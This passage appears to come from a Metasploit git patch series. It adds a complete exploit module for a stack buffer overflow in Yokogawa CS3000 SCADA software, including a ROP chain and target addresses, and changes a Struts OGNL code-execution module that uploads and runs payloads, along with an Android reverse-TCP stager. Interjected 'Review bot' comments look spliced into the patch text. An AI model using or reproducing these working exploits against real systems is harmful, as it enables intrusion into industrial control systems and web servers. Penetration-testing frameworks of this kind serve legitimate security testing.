} }) resp end From a71be330919c91b467c7fff6bc608eb8fa6a3233 Mon Sep 17 00:00:00 2001 
From: nstarke
Date: Fri, 9 May 2014 14:39:34 +0000
Subject: [PATCH 269/853] Adjusting status message to be based on time Previously the status message timing was determined by the number of pairs left to process. I have adjusted the code to rely on Time.now in order to consistently print a message out every 60 seconds.
---
 lib/msf/core/auxiliary/auth_brute.rb | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/lib/msf/core/auxiliary/auth_brute.rb b/lib/msf/core/auxiliary/auth_brute.rb
index 00140d8a79..dbe155321c 100644
--- a/lib/msf/core/auxiliary/auth_brute.rb
+++ b/lib/msf/core/auxiliary/auth_brute.rb
@@ -331,6 +331,8 @@ module Auxiliary::AuthBrute
 creds = [ [], [], [], [] ] # userpass, pass, user, rest
 remaining_pairs = combined_array.length # counter for our occasional output
+ interval = 60 # seconds between each remaining pair message reported to user
+ next_message_time = Time.now + interval # initial timing interval for user message
 # Move datastore['USERNAME'] and datastore['PASSWORD'] to the front of the list.
 # Note that we cannot tell the user intention if USERNAME or PASSWORD is blank --
 # maybe (and it's often) they wanted a blank. One more credential won't kill
@@ -345,11 +347,12 @@ module Auxiliary::AuthBrute
 else
 creds[3] << pair
 end
- if remaining_pairs % 500000 == 0
+ if Time.now > next_message_time
 print_brute(
 :level => :vstatus,
 :msg => "Pair list is still building with #{remaining_pairs} pairs left to process"
 )
+ next_message_time = Time.now + interval
 end
 remaining_pairs -= 1
 end
From f56ea019886d5b8e2f99f9490106041881cfa769 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Fri, 9 May 2014 10:27:41 -0500
Subject: [PATCH 270/853] Add module
---
 .../windows/scada/yokogawa_bkesimmgr_bof.rb | 160 ++++++++++++++++++
 1 file changed, 160 insertions(+)
 create mode 100644 modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb
diff --git a/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb b/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb new file mode 100644 index 0000000000..0fbfa732aa --- /dev/null +++ b/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb 
@@ -0,0 +1,160 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Yokogawa CS3000 BKESimmgr.exe Buffer Overflow', + 'Description' => %q{ + This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability + exists in the BKESimmgr.exe service when handling specially crafted packets, due to an + insecure usage of memcpy, using attacker controlled data as the size count. This module + has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows + 2003 SP2. + }, + 'Author' => + [ + 'juan vazquez', + 'Redsadic ' + ], + 'References' => + [ + ['CVE', '2014-0782'], + ['URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities'], + ['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf'] + ], + 'Payload' => + { + 'Space' => 340, + 'DisableNops' => true, + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + }, + 'Platform' => 'win', + 'Targets' => + [ + [ + 'Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]', + { + 'Ret' => 0x61d1274f, # 0x61d1274f # ADD ESP,10 # RETN # libbkebatchepa.dll + 'Offset' => 64, + 'FakeArgument1' => 0x0040E65C, # ptr to .data on BKESimmgr.exe + 'FakeArgument2' => 0x0040EB90 # ptr to .data on BKESimmgr.exe + } + ], + ], + 'DisclosureDate' => 'Mar 10 2014', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(34205) + ], self.class) + end + + def check + data = create_pkt(rand_text_alpha(4)) + + res = send_pkt(data) + + if res && res.length == 10 + simmgr_res = parse_response(res) + + if valid_response?(simmgr_res) + check_code = Exploit::CheckCode::Appears + else + 
check_code = Exploit::CheckCode::Safe + end + else + check_code = Exploit::CheckCode::Safe + end + + check_code + end + + def exploit + bof = rand_text(target['Offset']) + bof << [target.ret].pack("V") + bof << [target['FakeArgument1']].pack("V") + bof << [target['FakeArgument2']].pack("V") + bof << rand_text(16) # padding (corrupted bytes) + bof << create_rop_chain + bof << payload.encoded + + data = [0x1].pack("N") # Sub-operation id, <= 0x8 in order to pass the check at sub_4090B0 + data << [bof.length].pack("n") + data << bof + + pkt = create_pkt(data) + + print_status("Trying target #{target.name}, sending #{pkt.length} bytes...") + connect + sock.put(pkt) + disconnect + end + + def create_rop_chain + # rop chain generated with mona.py - www.corelan.be + rop_gadgets = + [ + 0x004047ca, # POP ECX # RETN [BKESimmgr.exe] + 0x610e3024, # ptr to &VirtualAlloc() [IAT libbkfmtvrecinfo.dll] + 0x61232d60, # MOV EAX,DWORD PTR DS:[ECX] # RETN [LibBKESysVWinList.dll] + 0x61d19e6a, # XCHG EAX,ESI # RETN [libbkebatchepa.dll] + 0x619436d3, # POP EBP # RETN [libbkeeda.dll] + 0x61615424, # & push esp # ret [libbkeldc.dll] + 0x61e56c8e, # POP EBX # RETN [LibBKCCommon.dll] + 0x00000001, # 0x00000001-> ebx + 0x61910021, # POP EDX # ADD AL,0 # MOV EAX,6191002A # RETN [libbkeeda.dll] + 0x00001000, # 0x00001000-> edx + 0x0040765a, # POP ECX # RETN [BKESimmgr.exe] + 0x00000040, # 0x00000040-> ecx + 0x6191aaab, # POP EDI # RETN [libbkeeda.dll] + 0x61e58e04, # RETN (ROP NOP) [LibBKCCommon.dll] + 0x00405ffa, # POP EAX # RETN [BKESimmgr.exe] + 0x90909090, # nop + 0x619532eb # PUSHAD # RETN [libbkeeda.dll] + ].pack("V*") + + rop_gadgets + end + + def create_pkt(data) + pkt = [0x01].pack("N") # Operation Identifier + pkt << [data.length].pack("n") # length + pkt << data # Fake packet + + pkt + end + + def send_pkt(data) + connect + sock.put(data) + res = sock.get_once + disconnect + + res + end + + def parse_response(data) + data.unpack("NnN") + end + + def valid_response?(data) + valid = 
false + + if data && data[0] == 1 && data[1] == 4 && data[1] == 4 && data[2] == 5 + valid = true + end + + valid + end + +end From ad83921a850660cdda818e2870936fc3a41c7ec8 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Fri, 9 May 2014 21:15:28 +0200 Subject: [PATCH 271/853] additional GET parameters --- .../multi/http/struts_code_exec_parameters.rb | 18 ++++++++++++++++-- 1 file changed, 16 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index ff29678af5..e78bf4d370 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -69,7 +69,8 @@ class Metasploit3 < Msf::Exploit::Remote Opt::RPORT(8080), OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.','username']), OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']), - OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) + OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]), + OptString.new('GET_PARAMETERS', [ false, 'Additional GET Parameters to send. Please supply in the format "param1=a¶m2=b". Do not URL encode the Parameters, they are encoded before sending by the module.', nil]), ], self.class) end 
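Review bot: `check` returns `Exploit::CheckCode::Safe` when `send_pkt` yields nothing or a reply that is not 10 bytes long, although a missing or unexpected reply says nothing about whether the service is patched. `check_code = Exploit::CheckCode::Unknown` in that outer `else` would keep an assessment from recording a false negative. In `valid_response?` the test `data[1] == 4` appears twice, so the second is redundant; if another field was intended it should be named, otherwise the method can end with `data && data[0] == 1 && data[1] == 4 && data[2] == 5`. `send_pkt` skips `disconnect` when `sock.put` or `sock.get_once` raises, which an `ensure` clause calling `disconnect` would cover.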
@@ -77,6 +78,19 @@ class Metasploit3 < Msf::Exploit::Remote datastore['PARAMETER'] end + def get_parameter + retval = {} + return retval unless datastore['GET_PARAMETERS'] + splitted = datastore['GET_PARAMETERS'].split('&') + return retval if splitted.nil? || splitted.empty? + splitted.each { |item| + name, value = item.split('=') + # no check here, value can be nil if parameter is ¶m + retval[name] = value + } + retval + end + def execute_command(cmd) junk = Rex::Text.rand_text_alpha(6) inject = "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]" @@ -86,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => uri, 'version' => '1.1', 'method' => 'GET', - 'vars_get' => { parameter => inject, "z[(#{parameter})(#{junk})]" => 'true' } + 'vars_get' => { parameter => inject, "z[(#{parameter})(#{junk})]" => 'true' }.merge(get_parameter) }) resp end From 43a85fc645fbc88f7bb753018a0069558e432693 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Fri, 9 May 2014 21:21:04 +0200 Subject: [PATCH 272/853] additional GET parameters --- modules/exploits/multi/http/struts_code_exec_parameters.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index e78bf4d370..77ff5104d0 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb 
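Review bot: In `get_parameter`, `item.split('=')` has no limit, so a value that itself contains `=` (base64 padding, for instance) is cut at the second `=`; `name, value = item.split('=', 2)` keeps the whole value. The guard `splitted.nil? || splitted.empty?` is not needed: `String#split` always returns an array, and an empty array already makes `each` a no-op. The multi-line `{ |item| ... }` block would read more conventionally as `do |item| ... end`, and a short comment on the method stating that it returns a Hash of parameter name to value (value nil when no `=` is present) would document the contract.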
@@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.','username']), OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']), OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]), - OptString.new('GET_PARAMETERS', [ false, 'Additional GET Parameters to send. Please supply in the format "param1=a¶m2=b". Do not URL encode the Parameters, they are encoded before sending by the module.', nil]), + OptString.new('GET_PARAMETERS', [ false, 'Additional GET Parameters to send. Please supply in the format "param1=a¶m2=b". Do apply URL encoding to the Parameters.', nil]), ], self.class) end @@ -86,7 +86,9 @@ class Metasploit3 < Msf::Exploit::Remote splitted.each { |item| name, value = item.split('=') # no check here, value can be nil if parameter is ¶m - retval[name] = value + decoded_name = name ? Rex::Text::uri_decode(name) : nil + decoded_value = value ? Rex::Text::uri_decode(value) : nil + retval[decoded_name] = decoded_value } retval end From 38f3a19673381cca7f8fd6642ca73e52cae0e5e3 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 9 May 2014 14:35:06 -0500 Subject: [PATCH 273/853] Try to beautify description --- modules/exploits/multi/http/struts_code_exec_parameters.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index 77ff5104d0..f56abec251 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb 
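Review bot: An empty segment in GET_PARAMETERS (as in `a=1&&b=2`) makes `item.split('=')` return an empty array, so `name` is nil and the loop stores `retval[nil] = nil`, which is later merged into `vars_get`. How the HTTP client treats a nil key is not visible here, so `next if name.nil? || name.empty?` before the decode is the safer choice. The existing comment only covers a nil value and should mention the name as well. The new calls are spelled `Rex::Text::uri_decode(...)`; the dot form, `Rex::Text.uri_decode(name)`, matches `Rex::Text.rand_text_alpha` used elsewhere in this file.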
@@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.','username']), OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']), OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]), - OptString.new('GET_PARAMETERS', [ false, 'Additional GET Parameters to send. Please supply in the format "param1=a¶m2=b". Do apply URL encoding to the Parameters.', nil]), + OptString.new('GET_PARAMETERS', [ false, 'Additional GET Parameters to send. Please supply in the format "param1=a¶m2=b". Do apply URL encoding to the parameters names and values if needed.', nil]), ], self.class) end From 453851277f30571cf898afc111b8ff25befd1ea6 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 9 May 2014 17:08:45 -0500 Subject: [PATCH 274/853] Fix missing space in prompt for back and grep --- lib/msf/ui/console/command_dispatcher/core.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 89fbc0d903..8dedea55e2 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -344,7 +344,7 @@ class Core # Restore the prompt prompt = framework.datastore['Prompt'] || Msf::Ui::Console::Driver::DefaultPrompt prompt_char = framework.datastore['PromptChar'] || Msf::Ui::Console::Driver::DefaultPromptChar - driver.update_prompt("#{prompt}", prompt_char, true) + driver.update_prompt("#{prompt} ", prompt_char, true) end end 
@@ -2609,7 +2609,7 @@ class Core if mod # if there is an active module, give them the fanciness they have come to expect driver.update_prompt("#{prompt} #{mod.type}(%bld%red#{mod.shortname}%clr) ", prompt_char, true) else - driver.update_prompt("#{prompt}", prompt_char, true) + driver.update_prompt("#{prompt} ", prompt_char, true) end # dump the command's output so we can grep it From dee6b531758cece12f321a210853516023ad57b9 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sat, 10 May 2014 00:19:40 +0200 Subject: [PATCH 275/853] fix java payload struts module --- .../multi/http/struts_code_exec_parameters.rb | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index f56abec251..ce98a33357 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -71,6 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']), OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]), OptString.new('GET_PARAMETERS', [ false, 'Additional GET Parameters to send. Please supply in the format "param1=a¶m2=b". Do apply URL encoding to the parameters names and values if needed.', nil]), + OptString.new('TMP_PATH', [ false, 'Overwrite the temp path for the file upload. Sometimes needed if the home directory is not writeable. Ensure there is a trailing slash!', nil]) ], self.class) end 
@@ -78,6 +79,14 @@ class Metasploit3 < Msf::Exploit::Remote datastore['PARAMETER'] end + def temp_path + return nil unless datastore['TMP_PATH'] + unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\') + fail_with(Failure::BadConfig, 'You need to add a trailing slash/backslash to TMP_PATH') + end + datastore['TMP_PATH'] + end + def get_parameter retval = {} return retval unless datastore['GET_PARAMETERS'] @@ -115,11 +124,12 @@ class Metasploit3 < Msf::Exploit::Remote #Now arch specific... case target['Platform'] when 'linux' - payload_exe = "/tmp/#{payload_exe}" + path = temp_path || '/tmp/' + payload_exe = "#{path}#{payload_exe}" chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{payload_exe}\".split(\"_\"))" exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{payload_exe}\".split(\"_\"))" when 'java' - payload_exe << ".jar" + payload_exe = "#{temp_path}#{payload_exe}.jar" pl_exe = payload.encoded_jar.pack exec_cmd = '' exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked')," @@ -131,12 +141,14 @@ class Metasploit3 < Msf::Exploit::Remote exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(" exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})" when 'windows' - payload_exe = "./#{payload_exe}.exe" + path = temp_path || './' + payload_exe = "#{path}#{payload_exe}.exe" exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{payload_exe}')" else fail_with(Failure::NoTarget, 'Unsupported target platform!') end + print_status("#{peer} - Uploading exploit to #{payload_exe}") #Now with all the arch specific stuff set, perform the upload. #109 = length of command string plus the max length of append. sub_from_chunk = 109 + payload_exe.length + datastore['TARGETURI'].length + parameter.length 
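Review bot: `temp_path` reads `datastore['TMP_PATH']` four times and chains two `end_with?` calls; `String#end_with?` accepts several suffixes, so `path = datastore['TMP_PATH']` followed by `unless path.end_with?('/', '\\')` says the same thing more directly. The helper both validates and returns the option and is called from the platform `case` in a later hunk, so a bad value is presumably reported only once that code is reached. Validating it once at the start of `exploit` would fail earlier, but that method begins outside these hunks. A one-line comment that the method returns nil when TMP_PATH is unset would explain the `temp_path || '/tmp/'` fallbacks.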
@@ -148,6 +160,7 @@ class Metasploit3 < Msf::Exploit::Remote append = true end java_upload_part(pl_exe, payload_exe, append) + print_status("#{peer} - Executing payload") execute_command(chmod_cmd) if target['Platform'] == 'linux' execute_command(exec_cmd) register_files_for_cleanup(payload_exe) From 92a9519fd910de5c6dee7bbdbed113cc108fbd55 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 9 May 2014 18:34:12 -0500 Subject: [PATCH 276/853] Remove EOL spaces --- modules/auxiliary/scanner/http/ntlm_info_enumeration.rb | 2 +- modules/auxiliary/scanner/ssl/openssl_heartbleed.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb index 8afd0bdb73..c3c2036cf0 100644 --- a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb +++ b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('TARGET_URI', [ false, "Single target URI", nil]), - OptPath.new('TARGET_URIS_FILE', [ false, "Path to list of URIs to request", + OptPath.new('TARGET_URIS_FILE', [ false, "Path to list of URIs to request", File.join(Msf::Config.data_directory, "wordlists", "http_owa_common.txt")]), ], self.class) end diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb index 3cca563d4b..a5d6db0841 100644 --- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb +++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb 
@@ -228,7 +228,7 @@ class Metasploit3 < Msf::Auxiliary # postgresql TLS - works with all modern pgsql versions - 8.0 - 9.3 # http://www.postgresql.org/docs/9.3/static/protocol-message-formats.html sock.get_once - # the postgres SSLRequest packet is a int32(8) followed by a int16(1234), + # the postgres SSLRequest packet is a int32(8) followed by a int16(1234), # int16(5679) in network format psql_sslrequest = [8].pack('N') psql_sslrequest << [1234, 5679].pack('n*') From ae0691c586b94b456ea588484d83aa944c566872 Mon Sep 17 00:00:00 2001 From: Tim Wright Date: Sat, 10 May 2014 17:00:25 +0100 Subject: [PATCH 277/853] make string replacement more robust --- modules/payloads/stagers/android/reverse_tcp.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb index a2ed71120c..c4d263f72e 100644 --- a/modules/payloads/stagers/android/reverse_tcp.rb +++ b/modules/payloads/stagers/android/reverse_tcp.rb @@ -36,8 +36,8 @@ module Metasploit3 classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'}) - string_sub(classes, '127.0.0.1 ', datastore['LHOST'].to_s) if datastore['LHOST'] - string_sub(classes, '4444 ', datastore['LPORT'].to_s) if datastore['LPORT'] + string_sub(classes, 'XXXX127.0.0.1 ', "XXXX" + datastore['LHOST'].to_s) if datastore['LHOST'] + string_sub(classes, 'YYYY4444 ', "YYYY" + datastore['LPORT'].to_s) if datastore['LPORT'] string_sub(classes, 'TTTT ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount'] jar.add_file("classes.dex", fix_dex_header(classes)) From a60558061cffc0dfb1fc1d31bb28b26d5e6521c7 Mon Sep 17 00:00:00 2001 From: Tim Wright Date: Sat, 10 May 2014 19:58:19 +0100 Subject: [PATCH 278/853] re-enable x86 stager --- .../exploits/android/browser/webview_addjavascriptinterface.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 9e3e7c232e..373fc8f2fd 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::BrowserAutopwn # Since the NDK stager is used, arch detection must be performed - SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE ] # todo: , ARCH_X86 ] + SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE, ARCH_X86 ] # Most android devices are ARM DEFAULT_ARCH = ARCH_ARMLE From 557cd56d924ea614304d4dd59da6f200e1e04b7d Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sat, 10 May 2014 23:31:02 +0200 Subject: [PATCH 279/853] fixed some ruby warnings --- modules/exploits/windows/firewall/blackice_pam_icq.rb | 2 +- modules/exploits/windows/misc/eureka_mail_err.rb | 2 +- modules/exploits/windows/misc/fb_svc_attach.rb | 6 ------ modules/exploits/windows/misc/ib_svc_attach.rb | 6 ------ modules/exploits/windows/misc/ibm_director_cim_dllinject.rb | 6 +++--- .../exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb | 2 +- modules/exploits/windows/misc/mirc_privmsg_server.rb | 2 +- modules/exploits/windows/misc/poppeeper_date.rb | 2 +- modules/exploits/windows/misc/talkative_response.rb | 2 +- modules/exploits/windows/misc/wireshark_lua.rb | 3 --- .../windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb | 5 +++-- modules/exploits/windows/mssql/mssql_linkcrawler.rb | 3 ++- 12 files changed, 14 insertions(+), 27 deletions(-) diff --git a/modules/exploits/windows/firewall/blackice_pam_icq.rb b/modules/exploits/windows/firewall/blackice_pam_icq.rb index 0dc06797de..c52735c975 100644 --- a/modules/exploits/windows/firewall/blackice_pam_icq.rb +++ b/modules/exploits/windows/firewall/blackice_pam_icq.rb 
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Payload' => { - 'Space' => 504 -31 -4, + 'Space' => 504-31-4, 'BadChars' => "\x00", 'MinNops' => 0, 'MaxNops' => 0, diff --git a/modules/exploits/windows/misc/eureka_mail_err.rb b/modules/exploits/windows/misc/eureka_mail_err.rb index 84d95f81b5..71bb61e51d 100644 --- a/modules/exploits/windows/misc/eureka_mail_err.rb +++ b/modules/exploits/windows/misc/eureka_mail_err.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) + return unless regenerate_payload(client) # the offset to eip depends on the local ip address string length... already = "Your POP3 server had a problem.\n" diff --git a/modules/exploits/windows/misc/fb_svc_attach.rb b/modules/exploits/windows/misc/fb_svc_attach.rb index b9a8b0044a..71daee3976 100644 --- a/modules/exploits/windows/misc/fb_svc_attach.rb +++ b/modules/exploits/windows/misc/fb_svc_attach.rb @@ -70,12 +70,6 @@ class Metasploit3 < Msf::Exploit::Remote connect - # Attach database - op_attach = 19 - - # Create database - op_create = 20 - # Service attach op_service_attach = 82 diff --git a/modules/exploits/windows/misc/ib_svc_attach.rb b/modules/exploits/windows/misc/ib_svc_attach.rb index 06b5546915..822aa33146 100644 --- a/modules/exploits/windows/misc/ib_svc_attach.rb +++ b/modules/exploits/windows/misc/ib_svc_attach.rb @@ -115,12 +115,6 @@ class Metasploit3 < Msf::Exploit::Remote connect - # Attach database - op_attach = 19 - - # Create database - op_create = 20 - # Service attach op_service_attach = 82 diff --git a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb index 7b6e5330cf..7584f318c6 100644 --- a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb +++ b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb 
@@ -85,8 +85,8 @@ class Metasploit3 < Msf::Exploit::Remote end # If there is no subdirectory in the request, we need to redirect. - if (request.uri == '/') or not (request.uri =~ /\/[^\/]+\//) - if (request.uri == '/') + if request.uri == '/' || request.uri !~ /\/[^\/]+\// + if request.uri == '/' subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/' else subdir = request.uri + '/' @@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote # dispatch based on extension if (request.uri =~ /\.dll$/i) print_status("Sending DLL") - return if ((p = regenerate_payload(cli)) == nil) + return unless regenerate_payload(cli) dll_payload = generate_payload_dll send_response(cli, dll_payload, { 'Content-Type' => 'application/octet-stream' }) else diff --git a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb index bef570f7d3..faa807e07b 100644 --- a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb +++ b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Insufficient data from CAD service.") return nil end - rca_port = data[24,port_str_len].unpack('n*').pack('C*').to_i + data[24,port_str_len].unpack('n*').pack('C*').to_i end diff --git a/modules/exploits/windows/misc/mirc_privmsg_server.rb b/modules/exploits/windows/misc/mirc_privmsg_server.rb index 0f7ba57388..c6a426e5d6 100644 --- a/modules/exploits/windows/misc/mirc_privmsg_server.rb +++ b/modules/exploits/windows/misc/mirc_privmsg_server.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) + return unless regenerate_payload(client) print_status("Client connected! Sending payload...") buffer = ":my_irc_server.com 001 wow :Welcome to the #{datastore['SRVNAME']} wow\r\n" client.put(buffer) 
diff --git a/modules/exploits/windows/misc/poppeeper_date.rb b/modules/exploits/windows/misc/poppeeper_date.rb index 7493959322..da45e45485 100644 --- a/modules/exploits/windows/misc/poppeeper_date.rb +++ b/modules/exploits/windows/misc/poppeeper_date.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_client_data(client) - return if ((p = regenerate_payload(client)) == nil) + return unless regenerate_payload(client) ok = "+OK\r\n" client.put(ok) diff --git a/modules/exploits/windows/misc/talkative_response.rb b/modules/exploits/windows/misc/talkative_response.rb index 07ab018d5f..fbeeec1603 100644 --- a/modules/exploits/windows/misc/talkative_response.rb +++ b/modules/exploits/windows/misc/talkative_response.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_client_data(client) - return if ((p = regenerate_payload(client)) == nil) + return unless regenerate_payload(client) sploit = ":" + rand_text_alpha_upper(272) + Rex::Arch::X86.jmp_short(6) sploit << rand_text_alpha_upper(2) + [target.ret].pack('V') + payload.encoded diff --git a/modules/exploits/windows/misc/wireshark_lua.rb b/modules/exploits/windows/misc/wireshark_lua.rb index 63ca919ef1..eec34a0ff8 100644 --- a/modules/exploits/windows/misc/wireshark_lua.rb +++ b/modules/exploits/windows/misc/wireshark_lua.rb @@ -128,9 +128,6 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status("Received WebDAV PROPFIND request: #{path}") body = '' - my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] - my_uri = "http://#{my_host}/" - if path !~ /\/$/ if path.index(".") print_status("Sending 404 for #{path} ...") diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb index 075012b678..c3595b637e 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb 
